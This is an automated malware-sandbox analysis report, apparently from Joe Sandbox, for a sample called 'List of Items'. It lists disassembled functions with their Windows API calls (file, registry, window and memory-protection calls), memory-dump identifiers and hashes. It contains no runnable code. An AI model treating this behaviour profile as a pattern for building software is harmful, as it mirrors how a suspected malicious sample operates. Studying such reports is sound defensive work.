                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
                                                • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                                • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                                Function 00405C16 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                • GetLastError.KERNEL32 ref: 00405C2A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: CreateDirectoryErrorLast
                                                • String ID:
                                                • API String ID: 1375471231-0
                                                • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                                                • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                                                Function 6DB62B98 Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                Download Yara Rule
                                                APIs
                                                • EnumWindows.USER32(00000000), ref: 6DB62C57
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674065859400.000000006DB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DB60000, based on PE: true
                                                • Associated: 00000000.00000002.674065823896.000000006DB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.674065893260.000000006DB64000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.674065926322.000000006DB66000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6db60000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: EnumWindows
                                                • String ID:
                                                • API String ID: 1129996299-0
                                                • Opcode ID: 02f093297c6474ecddf4e08e69388ed540796980ef61ead8f2e3781aeb7e4b4d
                                                • Instruction ID: fe387f81b16d9847760705ba0a01c6706ba1e4cb99e71259860738f30a919609
                                                • Opcode Fuzzy Hash: 02f093297c6474ecddf4e08e69388ed540796980ef61ead8f2e3781aeb7e4b4d
                                                • Instruction Fuzzy Hash: 5541BE725082C5EFEB318F64D984B7D37B4EB05318F228829EA06D714DC738D4A48BB5
                                                Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: FileMove
                                                • String ID:
                                                • API String ID: 3562171763-0
                                                • Opcode ID: 26fbc70d2e8597573122cea31dc6bfba5e45494ce0a55dbc8012e9dd9e1a121d
                                                • Instruction ID: be669950fb77a2d656db840ba494943e65029fea8fad8f9acd4f4e8736b9b328
                                                • Opcode Fuzzy Hash: 26fbc70d2e8597573122cea31dc6bfba5e45494ce0a55dbc8012e9dd9e1a121d
                                                • Instruction Fuzzy Hash: 62F0BB31A08120E7CB11BBB55F4DE5E2154DF83364F24023FF011B11D1D9BDC95255AE
                                                Function 00402891 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028AF
                                                  • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: FilePointerwsprintf
                                                • String ID:
                                                • API String ID: 327478801-0
                                                • Opcode ID: c5c8d79c1340bb369312f6a5c9378fe315f9bf95113b40b2c793821570691f3d
                                                • Instruction ID: 25e331afd2345d3cd5f25c8269d0b77429ab830f022e4fbb565c81036e55150a
                                                • Opcode Fuzzy Hash: c5c8d79c1340bb369312f6a5c9378fe315f9bf95113b40b2c793821570691f3d
                                                • Instruction Fuzzy Hash: 16E09271904104BFDB01EBA5BE499AEB7B8EF44319B10483BF102F00D0DA794D119B2D
                                                Function 00406503 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 0040652C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                • Instruction ID: 390987c888b9fe28ccc3a202ccefe0e129b8fdbaba7b34d45eb5723cdb444700
                                                • Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                • Instruction Fuzzy Hash: C1E0ECB2010109BEEF099F90EC0ADBB372DEB04704F41492EF907E4091E6B5AE70AA34
                                                Function 0040620A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00411DEC,0040CEF0,00403579,0040CEF0,00411DEC,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: FileWrite
                                                • String ID:
                                                • API String ID: 3934441357-0
                                                • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                                                • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                                                Function 004061DB Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                                                • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                                                Function 6DB62A7F Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualProtect.KERNELBASE(6DB6505C,00000004,00000040,6DB6504C), ref: 6DB62A9D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674065859400.000000006DB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DB60000, based on PE: true
                                                • Associated: 00000000.00000002.674065823896.000000006DB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.674065893260.000000006DB64000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.674065926322.000000006DB66000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6db60000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: aded389e1fac9033b6eb4b3deefb5fec6b64eea2ea7db2c4533370a0e0216b34
                                                • Instruction ID: df6e23984a9f71c60107353b4633aafde454e4705dd2a3de80712f4987471d35
                                                • Opcode Fuzzy Hash: aded389e1fac9033b6eb4b3deefb5fec6b64eea2ea7db2c4533370a0e0216b34
                                                • Instruction Fuzzy Hash: A2F07FB15042C1EFCB50CB2885447393BF0A70A204B16452EA18AD728EE37490688BA9
                                                Function 004064D5 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406563,?,00000000,?,?,Call,?), ref: 004064F9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Open
                                                • String ID:
                                                • API String ID: 71445658-0
                                                • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                • Instruction ID: 5036765eb4ab6e58186d81024f5778724aa2024cd81e2e1d5ca813995cf5404a
                                                • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                • Instruction Fuzzy Hash: BAD0123210020DBBDF115F90AD01FAB375DAB08310F018426FE06A4092D775D534A728
                                                Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 3f67fddbcb2c4727b19cad364a98ff9d03893c5cf97898e6ee5a661b68cffc78
                                                • Instruction ID: 77b6755767f32433cbba579d7de441064f90f02de732d0e129c6c43bd553ff67
                                                • Opcode Fuzzy Hash: 3f67fddbcb2c4727b19cad364a98ff9d03893c5cf97898e6ee5a661b68cffc78
                                                • Instruction Fuzzy Hash: F6D0C772B08100DBDB11DBA8AA08B8D73A0AB00328B208537D001F21D0E6B8C8469A2E
                                                Function 00404610 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 8557fc69485774ba4641c6a2d2b4437b1a5152abf7221d5f63999a85994ee7b6
                                                • Instruction ID: 1d0f09303225af8c469e983b8f6ba21d59f3f36861eec243a4bc5be8392dea83
                                                • Opcode Fuzzy Hash: 8557fc69485774ba4641c6a2d2b4437b1a5152abf7221d5f63999a85994ee7b6
                                                • Instruction Fuzzy Hash: 9EC09B71741700FBDE209B509F45F077794A754701F154979B741F60E0D775D410D62D
                                                Function 004035F8 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                Function 004045F9 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
                                                • Instruction ID: 26063d6d883ff380d2e1d7f9fe2b9d631bf033e6200e0a233fd0d302f8c02db7
                                                • Opcode Fuzzy Hash: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
                                                • Instruction Fuzzy Hash: 5BB01235286A00FBDE614B00DE09F457E62F764B01F048078F741240F0CAB300B5DF19
                                                Function 004045E6 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                Download Yara Rule
                                                APIs
